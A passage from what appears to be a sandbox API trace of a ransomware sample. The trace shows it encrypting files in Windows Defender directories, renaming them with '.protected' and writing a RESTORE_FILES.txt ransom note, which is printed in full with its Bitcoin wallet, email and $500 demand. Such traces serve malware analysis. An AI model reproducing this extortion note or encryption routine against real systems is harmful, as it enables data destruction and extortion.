75 [0071.617] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.617] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.617] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.617] lstrcmpiW (lpString1="MpSfc.bin", lpString2="Windows") returned -1 [0071.618] lstrcmpiW (lpString1="MpSfc.bin", lpString2="Program Files") returned -1 [0071.618] lstrcmpiW (lpString1="MpSfc.bin", lpString2="Program Files (x86)") returned -1 [0071.618] lstrcmpiW (lpString1="MpSfc.bin", lpString2="$Recycle.bin") returned 1 [0071.618] lstrcmpiW (lpString1="MpSfc.bin", lpString2="System Volume Information") returned -1 [0071.618] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin") returned 82 [0071.618] StrStrIW (lpFirst="MpSfc.bin", lpSrch=".protected") returned 0x0 [0071.618] lstrcmpW (lpString1="MpSfc.bin", lpString2="RESTORE_FILES.txt") returned -1 [0071.618] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0071.618] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0071.618] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0071.618] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin") returned 82 [0071.618] StrStrW (lpFirst="MpSfc.bin", lpSrch=".txt") returned 0x0 [0071.618] lstrlenW 
(lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin") returned 82 [0071.618] StrStrW (lpFirst="MpSfc.bin", lpSrch=".rar") returned 0x0 [0071.618] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin") returned 82 [0071.618] StrStrW (lpFirst="MpSfc.bin", lpSrch=".zip") returned 0x0 [0071.618] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0071.625] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.625] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0071.625] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.625] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0071.643] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0071.643] CloseHandle (hObject=0x14c) returned 1 [0071.643] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.protected") returned 92 [0071.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows 
Defender\\Scans\\History\\CacheManager\\MpSfc.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin.protected")) returned 1 [0071.644] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0071.644] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0071.644] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\RESTORE_FILES.txt") returned 90 [0071.644] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0071.646] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.646] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0071.647] lstrlenA (lpString="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") returned 684 [0071.647] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0071.647] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.647] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.647] CloseHandle (hObject=0xd8) returned 1 [0071.647] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.647] lstrcmpiW (lpString1="Results", lpString2="Windows") returned -1 [0071.647] lstrcmpiW (lpString1="Results", lpString2="Program Files") returned 1 [0071.647] lstrcmpiW (lpString1="Results", lpString2="Program Files (x86)") returned 1 [0071.647] lstrcmpiW (lpString1="Results", lpString2="$Recycle.bin") returned 1 [0071.647] lstrcmpiW (lpString1="Results", lpString2="System Volume Information") returned -1 [0071.647] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned 67 [0071.647] lstrcmpW (lpString1="Results", lpString2=".") returned 1 [0071.647] lstrcmpW (lpString1="Results", lpString2="..") returned 1 [0071.647] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*") returned 69 [0071.647] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0071.647] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.647] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.647] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.647] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.647] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.647] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\.") returned 69 [0071.647] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.647] FindNextFileW (in: 
hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.647] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.647] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.647] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.648] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.648] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.648] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\..") returned 70 [0071.648] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.648] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.648] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.648] lstrcmpiW (lpString1="Resource", lpString2="Windows") returned -1 [0071.648] lstrcmpiW (lpString1="Resource", lpString2="Program Files") returned 1 [0071.648] lstrcmpiW (lpString1="Resource", lpString2="Program Files (x86)") returned 1 [0071.648] lstrcmpiW (lpString1="Resource", lpString2="$Recycle.bin") returned 1 [0071.648] lstrcmpiW (lpString1="Resource", lpString2="System Volume Information") returned -1 [0071.648] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource") returned 76 [0071.648] lstrcmpW (lpString1="Resource", lpString2=".") returned 1 [0071.648] lstrcmpW (lpString1="Resource", lpString2="..") returned 1 [0071.648] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*") returned 78 [0071.648] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows 
Defender\\Scans\\History\\Results\\Resource\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x4a9250 [0071.648] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.648] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.648] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.648] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.648] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.648] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\.") returned 78 [0071.648] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.648] FindNextFileW (in: hFindFile=0x4a9250, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0071.648] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.648] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.648] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.648] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.648] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.648] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\..") returned 79 [0071.648] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.648] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.648] FindNextFileW (in: hFindFile=0x4a9250, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0071.648] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="Windows") returned -1 [0071.648] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="Program Files") returned -1 [0071.648] lstrcmpiW 
(lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="Program Files (x86)") returned -1 [0071.648] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="$Recycle.bin") returned 1 [0071.648] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="System Volume Information") returned -1 [0071.648] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}") returned 115 [0071.649] StrStrIW (lpFirst="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpSrch=".protected") returned 0x0 [0071.649] lstrcmpW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpString2="RESTORE_FILES.txt") returned -1 [0071.649] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0071.649] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4922f8*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x4922f8*, pdwDataLen=0x295e794*=0x30) returned 1 [0071.649] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0071.649] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}") returned 115 [0071.649] StrStrW (lpFirst="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpSrch=".txt") returned 0x0 [0071.649] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}") 
returned 115 [0071.649] StrStrW (lpFirst="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpSrch=".rar") returned 0x0 [0071.649] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}") returned 115 [0071.649] StrStrW (lpFirst="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}", lpSrch=".zip") returned 0x0 [0071.649] ReadFile (in: hFile=0x150, lpBuffer=0x49ec58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x49ec58*, lpNumberOfBytesRead=0x295e7b4*=0x1a60, lpOverlapped=0x0) returned 1 [0071.662] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe5a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.662] WriteFile (in: hFile=0x150, lpBuffer=0x49ec58*, nNumberOfBytesToWrite=0x1a60, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x49ec58*, lpNumberOfBytesWritten=0x295e7b4*=0x1a60, lpOverlapped=0x0) returned 1 [0071.662] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.662] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0071.663] WriteFile (in: hFile=0x150, lpBuffer=0x4922f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4922f8*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0071.663] CloseHandle (hObject=0x150) returned 1 [0071.663] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected") returned 125 [0071.663] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\{1d1dbf3a-752f-47e2-be70-d848d4a9afb0}.protected")) returned 1 [0071.664] FindNextFileW (in: hFindFile=0x4a9250, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0071.664] FindClose (in: hFindFile=0x4a9250 | out: hFindFile=0x4a9250) returned 1 [0071.664] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\RESTORE_FILES.txt") returned 94 [0071.664] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\resource\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0071.664] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.664] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0071.665] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.665] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0071.665] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.665] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0071.665] CloseHandle (hObject=0x14c) returned 1 [0071.666] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0071.666] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0071.666] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\RESTORE_FILES.txt") returned 85 [0071.666] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Results\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\results\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0071.666] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.666] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0071.667] lstrlenA (lpString="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") returned 684 [0071.667] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0071.667] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.667] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.667] CloseHandle (hObject=0xd8) returned 1 [0071.668] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.668] lstrcmpiW (lpString1="Service", lpString2="Windows") returned -1 [0071.668] lstrcmpiW (lpString1="Service", lpString2="Program Files") returned 1 [0071.668] lstrcmpiW (lpString1="Service", lpString2="Program Files (x86)") returned 1 [0071.668] lstrcmpiW (lpString1="Service", lpString2="$Recycle.bin") returned 1 [0071.668] lstrcmpiW (lpString1="Service", lpString2="System Volume Information") returned -1 [0071.668] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned 67 [0071.668] lstrcmpW (lpString1="Service", lpString2=".") returned 1 [0071.668] lstrcmpW (lpString1="Service", lpString2="..") returned 1 [0071.669] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*") returned 69 [0071.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0071.669] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.669] lstrcmpiW (lpString1=".", lpString2="Program 